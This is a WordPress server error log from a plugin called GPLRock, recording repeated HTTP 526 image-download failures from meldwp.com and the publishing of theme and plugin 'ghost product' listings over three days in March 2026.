skolka-a-contemporary-e-commerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [23-Mar-2026 01:15:48 UTC] GPLRock: Image download failed for product skolka-a-contemporary-e-commerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:21 UTC] GPLRock: Image download failed for product space-furniture-woocomerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:23 UTC] GPLRock: Image download failed for product zgen-digital-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:24 UTC] GPLRock: Image download failed for product space-furniture-woocomerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:25 UTC] GPLRock: Image download failed for product zgen-digital-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/space--furniture-woocomerce-theme-7756.webp for product space-furniture-woocomerce-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:26 UTC] GPLRock: Image download failed for product space-furniture-woocomerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zgen---digital-creative-agency--portfolio-wordpress-theme-4836.webp for product zgen-digital-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:28 UTC] GPLRock: Image download failed for product zgen-digital-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:28 UTC] GPLRock: Image download failed for product space-furniture-woocomerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:30 UTC] GPLRock: Image download failed for product zgen-digital-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/space--furniture-woocomerce-theme-7756.webp for product space-furniture-woocomerce-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:30 UTC] GPLRock WARNING: Image download failed for product space-furniture-woocomerce-theme. URL: https://meldwp.com/wp-content/uploads/space--furniture-woocomerce-theme-7756.webp [24-Mar-2026 01:46:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: space-furniture-woocomerce-theme [24-Mar-2026 01:46:30 UTC] GPLRock: Image download failed for product future-ai-agency-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zgen---digital-creative-agency--portfolio-wordpress-theme-4836.webp for product zgen-digital-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:32 UTC] GPLRock WARNING: Image download failed for product zgen-digital-creative-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zgen---digital-creative-agency--portfolio-wordpress-theme-4836.webp [24-Mar-2026 01:46:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zgen-digital-creative-agency-portfolio-wordpress-theme [24-Mar-2026 01:46:33 UTC] GPLRock: Image download failed for product future-ai-agency-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/future---ai-agency--technology-wordpress-theme-24771.webp for product future-ai-agency-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:35 UTC] GPLRock: Image download failed for product future-ai-agency-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:35 UTC] GPLRock: Image download failed for product minet-minimalist-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:37 UTC] GPLRock: Image download failed for product future-ai-agency-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:37 UTC] GPLRock: Image download failed for product minet-minimalist-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/future---ai-agency--technology-wordpress-theme-24771.webp for product future-ai-agency-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:39 UTC] GPLRock WARNING: Image download failed for product future-ai-agency-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/future---ai-agency--technology-wordpress-theme-24771.webp [24-Mar-2026 01:46:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: future-ai-agency-technology-wordpress-theme [24-Mar-2026 01:46:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minet---minimalist-ecommerce-wordpress-theme-8888.webp for product minet-minimalist-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:40 UTC] GPLRock: Image download failed for product minet-minimalist-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:40 UTC] GPLRock: Image download failed for product becipe-recipe-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:42 UTC] GPLRock: Image download failed for product minet-minimalist-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:42 UTC] GPLRock: Image download failed for product becipe-recipe-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minet---minimalist-ecommerce-wordpress-theme-8888.webp for product minet-minimalist-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:44 UTC] GPLRock WARNING: Image download failed for product minet-minimalist-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/minet---minimalist-ecommerce-wordpress-theme-8888.webp [24-Mar-2026 01:46:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: minet-minimalist-ecommerce-wordpress-theme [24-Mar-2026 01:46:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/becipe---recipe-blogging-wordpress-theme-30995.webp for product becipe-recipe-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:44 UTC] GPLRock: Image download failed for product becipe-recipe-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:44 UTC] GPLRock: Image download failed for product nora-woocommerce-theme-for-fashion-stores (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:46 UTC] GPLRock: Image download failed for product becipe-recipe-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:46 UTC] GPLRock: Image download failed for product nora-woocommerce-theme-for-fashion-stores (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/becipe---recipe-blogging-wordpress-theme-30995.webp for product becipe-recipe-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:48 UTC] GPLRock WARNING: Image download failed for product becipe-recipe-blogging-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/becipe---recipe-blogging-wordpress-theme-30995.webp [24-Mar-2026 01:46:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: becipe-recipe-blogging-wordpress-theme [24-Mar-2026 01:46:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nora---woocommerce-theme-for-fashion-stores-28697.webp for product nora-woocommerce-theme-for-fashion-stores after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:49 UTC] GPLRock: Image download failed for product nora-woocommerce-theme-for-fashion-stores (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:49 UTC] GPLRock: Image download failed for product rise-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:51 UTC] GPLRock: Image download failed for product nora-woocommerce-theme-for-fashion-stores (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:51 UTC] GPLRock: Image download failed for product rise-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nora---woocommerce-theme-for-fashion-stores-28697.webp for product nora-woocommerce-theme-for-fashion-stores after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:53 UTC] GPLRock WARNING: Image download failed for product nora-woocommerce-theme-for-fashion-stores. URL: https://meldwp.com/wp-content/uploads/nora---woocommerce-theme-for-fashion-stores-28697.webp [24-Mar-2026 01:46:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rise---business--consulting-wordpress-theme-9054.webp for product rise-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nora-woocommerce-theme-for-fashion-stores [24-Mar-2026 01:46:53 UTC] GPLRock: Image download failed for product rise-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:53 UTC] GPLRock: Image download failed for product me-voy-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:55 UTC] GPLRock: Image download failed for product rise-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:55 UTC] GPLRock: Image download failed for product me-voy-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:46:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rise---business--consulting-wordpress-theme-9054.webp for product rise-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:57 UTC] GPLRock WARNING: Image download failed for product rise-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rise---business--consulting-wordpress-theme-9054.webp [24-Mar-2026 01:46:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/me-voy---photography-portfolio-wordpress-theme-7268.webp for product me-voy-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:46:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rise-business-consulting-wordpress-theme [24-Mar-2026 01:47:00 UTC] GPLRock: Image download failed for product me-voy-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:02 UTC] GPLRock: Image download failed for product me-voy-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/me-voy---photography-portfolio-wordpress-theme-7268.webp for product me-voy-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:47:04 UTC] GPLRock WARNING: Image download failed for product me-voy-photography-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/me-voy---photography-portfolio-wordpress-theme-7268.webp [24-Mar-2026 01:47:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: me-voy-photography-portfolio-wordpress-theme [24-Mar-2026 01:47:07 UTC] GPLRock: Image download failed for product space-furniture-woocomerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:09 UTC] GPLRock: Image download failed for product space-furniture-woocomerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/space--furniture-woocomerce-theme-7756.webp for product space-furniture-woocomerce-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:47:12 UTC] GPLRock: Image download failed for product space-furniture-woocomerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:14 UTC] GPLRock: Image download failed for product space-furniture-woocomerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/space--furniture-woocomerce-theme-7756.webp for product space-furniture-woocomerce-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:47:16 UTC] GPLRock WARNING: Image download failed for product space-furniture-woocomerce-theme. URL: https://meldwp.com/wp-content/uploads/space--furniture-woocomerce-theme-7756.webp [24-Mar-2026 01:47:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: space-furniture-woocomerce-theme [24-Mar-2026 01:47:19 UTC] GPLRock: Image download failed for product future-ai-agency-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:21 UTC] GPLRock: Image download failed for product future-ai-agency-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/future---ai-agency--technology-wordpress-theme-24771.webp for product future-ai-agency-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:47:27 UTC] GPLRock: Image download failed for product future-ai-agency-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:29 UTC] GPLRock: Image download failed for product future-ai-agency-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/future---ai-agency--technology-wordpress-theme-24771.webp for product future-ai-agency-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:47:31 UTC] GPLRock WARNING: Image download failed for product future-ai-agency-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/future---ai-agency--technology-wordpress-theme-24771.webp [24-Mar-2026 01:47:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: future-ai-agency-technology-wordpress-theme [24-Mar-2026 01:47:31 UTC] GPLRock: Image download failed for product becipe-recipe-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:33 UTC] GPLRock: Image download failed for product becipe-recipe-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/becipe---recipe-blogging-wordpress-theme-30995.webp for product becipe-recipe-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:47:36 UTC] GPLRock: Image download failed for product becipe-recipe-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:38 UTC] GPLRock: Image download failed for product becipe-recipe-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/becipe---recipe-blogging-wordpress-theme-30995.webp for product becipe-recipe-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:47:40 UTC] GPLRock WARNING: Image download failed for product becipe-recipe-blogging-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/becipe---recipe-blogging-wordpress-theme-30995.webp [24-Mar-2026 01:47:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: becipe-recipe-blogging-wordpress-theme [24-Mar-2026 01:47:40 UTC] GPLRock: Image download failed for product rise-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:42 UTC] GPLRock: Image download failed for product rise-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rise---business--consulting-wordpress-theme-9054.webp for product rise-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:47:45 UTC] GPLRock: Image download failed for product rise-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:47 UTC] GPLRock: Image download failed for product rise-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rise---business--consulting-wordpress-theme-9054.webp for product rise-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:47:49 UTC] GPLRock WARNING: Image download failed for product rise-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rise---business--consulting-wordpress-theme-9054.webp [24-Mar-2026 01:47:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rise-business-consulting-wordpress-theme [24-Mar-2026 01:47:49 UTC] GPLRock: Image download failed for product cycure-cyber-security-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:51 UTC] GPLRock: Image download failed for product cycure-cyber-security-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cycure---cyber-security-services-wordpress-theme-5248.webp for product cycure-cyber-security-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:47:53 UTC] GPLRock: Image download failed for product cycure-cyber-security-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:56 UTC] GPLRock: Image download failed for product cycure-cyber-security-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [24-Mar-2026 01:47:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cycure---cyber-security-services-wordpress-theme-5248.webp for product cycure-cyber-security-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [24-Mar-2026 01:47:58 UTC] GPLRock WARNING: Image download failed for product cycure-cyber-security-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cycure---cyber-security-services-wordpress-theme-5248.webp [24-Mar-2026 01:47:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cycure-cyber-security-services-wordpress-theme [24-Mar-2026 01:48:02 UTC] GPLRock: Image downloaded successfully for product megashop-prestashop-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a44d2b57.webp [24-Mar-2026 01:48:02 UTC] GPLRock: Using pre-downloaded image for product megashop-prestashop-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a44d2b57.webp [24-Mar-2026 01:48:02 UTC] GPLRock: Ghost product published with image - Product ID: megashop-prestashop-theme [25-Mar-2026 01:35:48 UTC] GPLRock: Image download failed for product jurak-one-page-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:35:50 UTC] GPLRock: Image download failed for product jurak-one-page-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:35:50 UTC] GPLRock: Image downloaded successfully for product give-stripe-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b063ecdb.jpg [25-Mar-2026 01:35:50 UTC] GPLRock: Using pre-downloaded image for product give-stripe-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b063ecdb.jpg [25-Mar-2026 01:35:50 UTC] GPLRock: Ghost product published with image - Product ID: give-stripe-gateway [25-Mar-2026 01:35:51 UTC] GPLRock: Image downloaded successfully for product give-gocardless-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b67245b5.jpg [25-Mar-2026 01:35:51 UTC] GPLRock: Using pre-downloaded image for product give-gocardless-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b67245b5.jpg [25-Mar-2026 01:35:51 UTC] GPLRock: Ghost product published with image - Product ID: give-gocardless-gateway [25-Mar-2026 01:35:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jurak---one-page-portfolio-wordpress-theme-10219.webp for product jurak-one-page-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [25-Mar-2026 01:35:52 UTC] GPLRock: Image download failed for product jurak-one-page-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:35:53 UTC] GPLRock: Image downloaded successfully for product studiopress-author-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d199922.jpg [25-Mar-2026 01:35:53 UTC] GPLRock: Using pre-downloaded image for product studiopress-author-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d199922.jpg [25-Mar-2026 01:35:53 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-author-pro-genesis-wordpress-theme [25-Mar-2026 01:35:54 UTC] GPLRock: Image download failed for product jurak-one-page-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:35:54 UTC] GPLRock: Image downloaded successfully for product convert-pro-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dea31dc0.png [25-Mar-2026 01:35:55 UTC] GPLRock: Using pre-downloaded image for product convert-pro-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dea31dc0.png [25-Mar-2026 01:35:55 UTC] GPLRock: Ghost product published with image - Product ID: convert-pro-addon [25-Mar-2026 01:35:56 UTC] GPLRock: Image downloaded successfully for product shopkeeper-ecommerce-wp-theme-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a047b248.avif [25-Mar-2026 01:35:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jurak---one-page-portfolio-wordpress-theme-10219.webp for product jurak-one-page-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [25-Mar-2026 01:35:56 UTC] GPLRock WARNING: Image download failed for product jurak-one-page-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/jurak---one-page-portfolio-wordpress-theme-10219.webp [25-Mar-2026 01:35:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jurak-one-page-portfolio-wordpress-theme [25-Mar-2026 01:35:58 UTC] GPLRock: Using pre-downloaded image for product shopkeeper-ecommerce-wp-theme-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a047b248.avif [25-Mar-2026 01:35:58 UTC] GPLRock: Ghost product published with image - Product ID: shopkeeper-ecommerce-wp-theme-for-woocommerce [25-Mar-2026 01:35:59 UTC] GPLRock: Image download failed for product axole-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:00 UTC] GPLRock: Image downloaded successfully for product sabai-discuss-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1e97571e.jpg [25-Mar-2026 01:36:00 UTC] GPLRock: Using pre-downloaded image for product sabai-discuss-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1e97571e.jpg [25-Mar-2026 01:36:00 UTC] GPLRock: Ghost product published with image - Product ID: sabai-discuss-plugin-for-wordpress [25-Mar-2026 01:36:01 UTC] GPLRock: Image download failed for product axole-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:01 UTC] GPLRock: Image downloaded successfully for product sabai-directory-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e181d37.jpg [25-Mar-2026 01:36:02 UTC] GPLRock: Using pre-downloaded image for product sabai-directory-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e181d37.jpg [25-Mar-2026 01:36:02 UTC] GPLRock: Ghost product published with image - Product ID: sabai-directory-plugin-for-wordpress [25-Mar-2026 01:36:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/axole---creative-agency--portfolio-wordpress-theme-8322.webp for product axole-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [25-Mar-2026 01:36:03 UTC] GPLRock: Image downloaded successfully for product woo-import-export (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dab7ca5d.jpg [25-Mar-2026 01:36:04 UTC] GPLRock: Using pre-downloaded image for product woo-import-export: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dab7ca5d.jpg [25-Mar-2026 01:36:04 UTC] GPLRock: Ghost product published with image - Product ID: woo-import-export [25-Mar-2026 01:36:04 UTC] GPLRock: Image download failed for product axole-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:06 UTC] GPLRock: Image download failed for product axole-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:07 UTC] GPLRock: Image downloaded successfully for product gravity-forms-styles-pro-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b889dc3c.jpg [25-Mar-2026 01:36:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/axole---creative-agency--portfolio-wordpress-theme-8322.webp for product axole-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [25-Mar-2026 01:36:08 UTC] GPLRock WARNING: Image download failed for product axole-creative-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/axole---creative-agency--portfolio-wordpress-theme-8322.webp [25-Mar-2026 01:36:08 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-styles-pro-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b889dc3c.jpg [25-Mar-2026 01:36:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: axole-creative-agency-portfolio-wordpress-theme [25-Mar-2026 01:36:08 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-styles-pro-add-on [25-Mar-2026 01:36:08 UTC] GPLRock: Image download failed for product sitecrest-web-hosting-wordpress-whmcs-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:09 UTC] GPLRock: Image downloaded successfully for product global-gallery-wordpress-responsive-gallery (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cadfcd1e.avif [25-Mar-2026 01:36:09 UTC] GPLRock: Using pre-downloaded image for product global-gallery-wordpress-responsive-gallery: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cadfcd1e.avif [25-Mar-2026 01:36:09 UTC] GPLRock: Ghost product published with image - Product ID: global-gallery-wordpress-responsive-gallery [25-Mar-2026 01:36:10 UTC] GPLRock: Image download failed for product sitecrest-web-hosting-wordpress-whmcs-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sitecrest--web-hosting-wordpress--whmcs-theme-25526.webp for product sitecrest-web-hosting-wordpress-whmcs-theme after 3 attempts. HTTP Code: 526, Error: [25-Mar-2026 01:36:14 UTC] GPLRock: Image download failed for product sitecrest-web-hosting-wordpress-whmcs-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:16 UTC] GPLRock: Image download failed for product sitecrest-web-hosting-wordpress-whmcs-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sitecrest--web-hosting-wordpress--whmcs-theme-25526.webp for product sitecrest-web-hosting-wordpress-whmcs-theme after 3 attempts. HTTP Code: 526, Error: [25-Mar-2026 01:36:18 UTC] GPLRock WARNING: Image download failed for product sitecrest-web-hosting-wordpress-whmcs-theme. URL: https://meldwp.com/wp-content/uploads/sitecrest--web-hosting-wordpress--whmcs-theme-25526.webp [25-Mar-2026 01:36:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sitecrest-web-hosting-wordpress-whmcs-theme [25-Mar-2026 01:36:18 UTC] GPLRock: Image download failed for product takorent-food-trucking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:20 UTC] GPLRock: Image download failed for product takorent-food-trucking-wordpress-theme (attempt 2/3). HTTP 